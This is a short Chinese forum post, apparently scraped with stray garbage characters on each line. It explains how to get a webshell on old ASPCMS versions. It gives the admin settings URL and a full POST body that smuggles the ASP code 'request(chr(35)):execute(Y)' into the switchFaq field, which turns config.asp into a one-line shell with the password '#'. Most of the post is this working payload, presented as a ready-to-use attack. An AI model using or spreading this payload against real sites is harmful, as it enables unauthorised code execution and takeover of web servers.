老的ASPCMS版本的秒杀拿SHELL漏洞9 x Y g2 |* W7 A8 G0 P
* c( w% Z# D# t# S
找到后台。。。然后4 N' y- q/ w9 K2 E7 @; F
3 b! a# A6 }: V; D, g1 j
/admin/_system/AspCms_SiteSetting.asp?action=saves
. A( @$ ~" e! S3 u
, T0 W# @9 V! m4 U4 O: u直接POST' {( E$ k, m# y! o! G# q' d
: ~9 }) W1 F8 W0 X7 R
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
+ l! c5 [% o+ ~- N4 N9 _" F% q & f0 g" i ]4 R" N7 t) J
再连接配置文件config.asp 密码为#" j' R0 M' U6 d* u/ j/ K1 k# t. Z
|